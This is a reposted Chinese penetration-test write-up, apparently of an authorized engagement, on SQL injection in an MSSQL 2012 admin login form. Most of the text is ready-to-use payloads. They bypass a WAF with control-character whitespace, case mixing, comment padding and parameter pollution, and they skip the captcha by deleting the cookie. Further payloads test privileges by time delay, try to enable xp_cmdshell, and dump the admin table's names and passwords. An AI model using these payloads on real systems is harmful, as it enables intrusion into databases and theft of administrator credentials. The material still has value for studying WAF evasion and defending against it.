文章来源:先知社区(kyrie403)
原文地址:https://xz.aliyun.com/t/7487
本次测试为授权测试。注入点在后台登陆的用户名处
存在验证码,可通过删除Cookie和验证码字段绕过验证
添加一个单引号,报错
and '1'='1连接重置——被WAF拦截
改变大小写并将空格替换为MSSQL空白符[0x00-0x20]
查询数据库版本,MSSQL 2012 x64
%1eoR%[email protected]@version%1e--查询当前用户
%1eoR%1e1=user%1e--查询当前用户是否为dba和db_owner
;if(0=(SelEct%1eis_srvrolemember('sysadmin'))) WaItFOR%1edeLAY%1e'0:0:5'%1e --;if(0=(SelEct%1eis_srvrolemember('db_owner'))) WaItFOR%1edeLAY%1e'0:0:5'%1e --
均出现延时,当前用户既不是dba也不是db_owner
尝试执行xp_cmdsehll,没有相关权限
;eXeC%1esp_configure%1e'show advanced options',1;RECONFIGURE%1e --;eXeC%1esp_configure%1e'xp_cmdshell',1;RECONFIGURE%1e --
%1eoR%1e1=(db_name()%1e)%1e--去掉函数名的一个字符则正常返回——WAF过滤了函数db_name()。MSSQL和MSQL有一些相同的特性,比如:函数名和括号之前可用注释或空白符填充
%1eoR%1e1=(db_name/**/()%1e)%1e--%1eoR%1e1=(SelEct%1etop%1e1%1etaBle_nAme from%1einfOrmatiOn_sChema.tAbles%1e)%1e--%1eoR%1e1=(SelEct/*&username=*/%1etop%1e1%1etaBle_nAme from%1einfOrmatiOn_sChema.tAbles%1e)%1e--%1eoR%1e1=(SelEct/*&username=*/%1etop%1e1%1etaBle_nAme from%1einfOrmatiOn_sChema%0f.%0ftAbles%1e)%1e--%1eoR%1e1=(SelEct/*&username=*/%1equotename(name)%1efRom bak_ptfl%0f..sysobjects%1ewHerE%1extype='U' FOR XML PATH(''))%1e--%1eoR%1e1=(SelEct/*&username=*/%1equotename/**/(name)%1efRom bak_ptfl%0f..syscolumns%1ewHerE%1eid=(selEct/*&username=*/%1eid%1efrom%1ebak_ptfl%0f..sysobjects%1ewHerE%1ename='appsadmin')%1efoR%1eXML%1ePATH/**/(''))%1e--&password=admin%1eoR%1e1=(SelEct/*&username=*/%1etOp%1e1%1eAdminName%1efRom%1eappsadmin%1e)%1e--%1eoR%1e1=(SelEct/*&username=*/%1etOp%1e1%1epassword%1efRom%1eappsadmin)%1e--
侵权请私聊公众号删文
推荐阅读
查看更多精彩内容,还请关注橘猫学安全:
每日坚持学习与分享,觉得文章对你有帮助可在底部给点个“再看”
文章来源: http://mp.weixin.qq.com/s?__biz=Mzg5OTY2NjUxMw==&mid=2247494634&idx=2&sn=cdda87b36a2ab6e8bb04dfe12d1247b6&chksm=c04d6cd4f73ae5c228acb6ccaada959848c6d59a79e1fd6eace1a0f4c19b7edd340bd321c479#rd
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh